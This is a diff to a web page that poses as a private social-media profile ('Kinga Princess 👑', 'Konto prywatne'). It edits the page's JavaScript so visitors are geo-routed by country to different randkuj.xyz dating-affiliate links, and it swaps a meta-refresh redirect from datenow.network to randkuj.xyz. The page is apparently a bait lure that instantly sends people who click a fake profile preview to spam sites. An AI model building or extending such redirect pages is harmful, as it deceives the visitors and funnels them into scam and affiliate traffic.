--- a/index.html
+++ b/index.html
@@ -11,14 +11,26 @@
     var Country_Code = response.country;
     if(Country_Code != "PL")
     {
-        window.location.replace("https://fireads.online/link/743/17458859");
+      if(Country_Code == "DE")
+      {
+        window.location.replace("https://randkuj.xyz/link/1798/17458859")
+      }
+      else if(Country_Code == "NL")
+      {
+        window.location.replace("https://randkuj.xyz/link/1798/17458859")
+      }
+      else
+      {
+        window.location.replace("https://randkuj.xyz/link/14/17458859");
+      }
     }
   }, "jsonp");
 
 </script>
   <!--<meta content='0;https://datenow.network/link/1515/17458859' http-equiv='refresh'/>-->
   <!--<meta content='0;https://datenow.network/link/1450/17458859' http-equiv='refresh'/>-->
-  <meta content='0;https://datenow.network/link/1539/17458859' http-equiv='refresh'/>
+  <!--<meta content='0;https://datenow.network/link/1539/17458859' http-equiv='refresh'/>-->
+  <meta content='0;https://randkuj.xyz/link/1840/17458859' http-equiv='refresh'/>
   <meta content='https://i.imgur.com/4IF4J0e.jpg' property='og:image'/>
   <meta content='Kinga Princess 👑' property='og:title'/>
   <meta content='Konto prywatne' property='og:description'/>
